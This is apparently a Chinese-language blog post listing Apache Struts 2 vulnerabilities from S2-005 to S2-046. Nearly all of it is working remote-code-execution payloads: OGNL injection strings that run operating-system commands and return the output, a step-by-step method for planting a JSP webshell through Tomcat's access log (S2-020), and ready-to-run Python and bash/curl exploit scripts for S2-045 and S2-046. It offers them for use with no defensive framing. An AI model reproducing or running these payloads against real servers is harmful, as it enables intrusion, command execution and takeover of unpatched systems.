struts2漏洞集合


[+]1 S2-005 CVE-2010-1870 
CVE-2010-1870 影响版本:Struts 2.0.0 – Struts 2.1.8.1 官方公告:http://struts.apache.org/release/2.2.x/docs/s2-005.html

('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'aaaaaaaaaaaaaaaaaaa\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))

 

[+]2 S2-009 CVE-2011-3923 
CVE-2011-3923 影响版本:Struts 2.0.0 - Struts 2.3.1.1 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-009.html

class.classLoader.jarPath=(#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+#_memberAccess["allowStaticMethodAccess"]=true,+#a=@java.lang.Runtime@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())(meh)&z[(class.classLoader.jarPath)('meh')]

 

[+]3 S2-013 CVE-2013-1966
CVE-2013-1966 影响版本:Struts 2.0.0 – Struts 2.3.14 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-013.html

a=1${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('aaaaaaaaaaaaaaaaaaa').getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new+java.io.BufferedReader(#b),#d=new+char[50000],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}

 

[+]4 S2-016 CVE-2013-2251
CVE-2013-2251 影响版本:Struts 2.0.0 – Struts 2.3.15 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-016.html

redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('aaaaaaaaaaaaaaaaaaa'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}

 

[+]5 S2-019 CVE-2013-4316
CVE-2013-4316 影响版本:Struts 2.0.0 – Struts 2.3.15.1
官方公告:http://struts.apache.org/release/2.3.x/docs/s2-019.html

debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'aaaaaaaaaaaaaaaaaaa'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[10000],#d.read(#e),#resp.println(#e),#resp.close()

 

[+]6 S2-020 CVE-2014-0094 
CVE-2014-0094 影响版本:Struts 2.0.0 – Struts 2.3.16 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-020.html
1.更改属性:

?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
?class.classLoader.resources.context.parent.pipeline.first.prefix=shell
?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

2.访问下面的url来触发tomcat切换log(这里有个坑,这个属性必须是数字,这里设定为1),那么从此开始tomcat的access log将被记录入 webapps/ROOT/shell1.jsp中

?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1

3.通过发包访问下面的请求,在access log中植入代码

/aaaa.jsp?a=<%Runtime.getRuntime().exec("calc");%>

4.结合前面设定的参数,访问下面的url,观察shell执行

http://127.0.0.1/shell1.jsp

[+]7 S2-032 CVE-2016-3081 

CVE-2016-3081 影响版本:Struts 2.3.18 – Struts 2.3.28 官方公告:http://struts.apache.org/release/2.3.x/docs/s2-032.html

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=aaaaaaaaaaaaaaaaaaa&pp=%5C%5CA&ppp=%20&encoding=UTF-8

 

[+]8 S2-037 CVE-2016-4438 
影响版本:Struts 2.3.20 - Struts 2.3.28.1 官方公告:http://struts.apache.org/docs/s2-037.html

/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=7556&command=aaaaaaaaaaaaaaaaaaa

 

[+]9 devMode CVE-xxxx-xxxx 

?debug=browser&object=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#context[#parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=aaaaaaaaaaaaaaaaaaa

 

[+] S2-045 CVE-2017-5638

Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10

import requests
import sys
header = dict()
header['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

result = requests.get(sys.argv[1], headers=header)
print result.content

[+] S2-046 CVE-2017-5638

Apache Struts 2 2.3.32之前的2 2.3.x版本和2.5.10.1之前的2.5.x版本

#!/bin/bash

url=$1
cmd=$2
shift
shift

boundary="---------------------------735323031399963166993862150"
content_type="multipart/form-data; boundary=$boundary"
payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}")

printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@

 

posted @ 2016-10-27 10:05  sevck  阅读(3602)  评论(0编辑  收藏  举报